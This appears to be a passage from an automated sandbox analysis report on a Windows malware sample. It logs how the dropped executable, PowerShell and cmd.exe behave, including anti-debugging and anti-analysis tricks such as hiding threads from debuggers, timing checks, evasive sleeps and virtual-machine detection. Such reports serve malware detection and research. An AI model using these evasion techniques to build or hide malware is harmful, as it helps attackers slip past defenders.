Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314096E rdtsc 12_2_0314096E
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7881 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1929 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 6569 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3402 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\160420241245287.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 2.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 Thread sleep count: 6569 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 Thread sleep time: -13138000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 Thread sleep count: 3402 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 Thread sleep time: -6804000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe TID: 1740 Thread sleep time: -35000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405772
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_0040622D FindFirstFileW,FindClose, 0_2_0040622D
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_0284B880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: 160420241245287.exe, 00000000.00000002.1650258506.0000000000750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW bw
Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}
Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887063511.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000E.00000002.2438974252.000001EC1020C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: C:\Users\user\Desktop\160420241245287.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\160420241245287.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314096E rdtsc 12_2_0314096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0327D508 LdrInitializeThunk,LdrInitializeThunk, 1_2_0327D508
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406254
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03120310 mov ecx, dword ptr fs:[00000030h] 12_2_03120310
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h] 12_2_0313A30B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h] 12_2_0313A30B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h] 12_2_0313A30B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FC310 mov ecx, dword ptr fs:[00000030h] 12_2_030FC310
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h] 12_2_031D8324
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D8324 mov ecx, dword ptr fs:[00000030h] 12_2_031D8324
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h] 12_2_031D8324
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h] 12_2_031D8324
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov ecx, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h] 12_2_0318035C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A8350 mov ecx, dword ptr fs:[00000030h] 12_2_031A8350
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CA352 mov eax, dword ptr fs:[00000030h] 12_2_031CA352
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h] 12_2_03182349
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D634F mov eax, dword ptr fs:[00000030h] 12_2_031D634F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A437C mov eax, dword ptr fs:[00000030h] 12_2_031A437C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h] 12_2_030FE388
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h] 12_2_030FE388
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h] 12_2_030FE388
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h] 12_2_030F8397
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h] 12_2_030F8397
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h] 12_2_030F8397
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312438F mov eax, dword ptr fs:[00000030h] 12_2_0312438F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312438F mov eax, dword ptr fs:[00000030h] 12_2_0312438F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h] 12_2_031AE3DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h] 12_2_031AE3DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE3DB mov ecx, dword ptr fs:[00000030h] 12_2_031AE3DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h] 12_2_031AE3DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A43D4 mov eax, dword ptr fs:[00000030h] 12_2_031A43D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A43D4 mov eax, dword ptr fs:[00000030h] 12_2_031A43D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0310A3C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h] 12_2_031083C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h] 12_2_031083C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h] 12_2_031083C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h] 12_2_031083C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BC3CD mov eax, dword ptr fs:[00000030h] 12_2_031BC3CD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031863C0 mov eax, dword ptr fs:[00000030h] 12_2_031863C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0311E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0311E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0311E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031363FF mov eax, dword ptr fs:[00000030h] 12_2_031363FF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h] 12_2_031103E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F823B mov eax, dword ptr fs:[00000030h] 12_2_030F823B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D625D mov eax, dword ptr fs:[00000030h] 12_2_031D625D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106259 mov eax, dword ptr fs:[00000030h] 12_2_03106259
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BA250 mov eax, dword ptr fs:[00000030h] 12_2_031BA250
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BA250 mov eax, dword ptr fs:[00000030h] 12_2_031BA250
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03188243 mov eax, dword ptr fs:[00000030h] 12_2_03188243
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03188243 mov ecx, dword ptr fs:[00000030h] 12_2_03188243
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA250 mov eax, dword ptr fs:[00000030h] 12_2_030FA250
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F826B mov eax, dword ptr fs:[00000030h] 12_2_030F826B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h] 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104260 mov eax, dword ptr fs:[00000030h] 12_2_03104260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104260 mov eax, dword ptr fs:[00000030h] 12_2_03104260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104260 mov eax, dword ptr fs:[00000030h] 12_2_03104260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E284 mov eax, dword ptr fs:[00000030h] 12_2_0313E284
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E284 mov eax, dword ptr fs:[00000030h] 12_2_0313E284
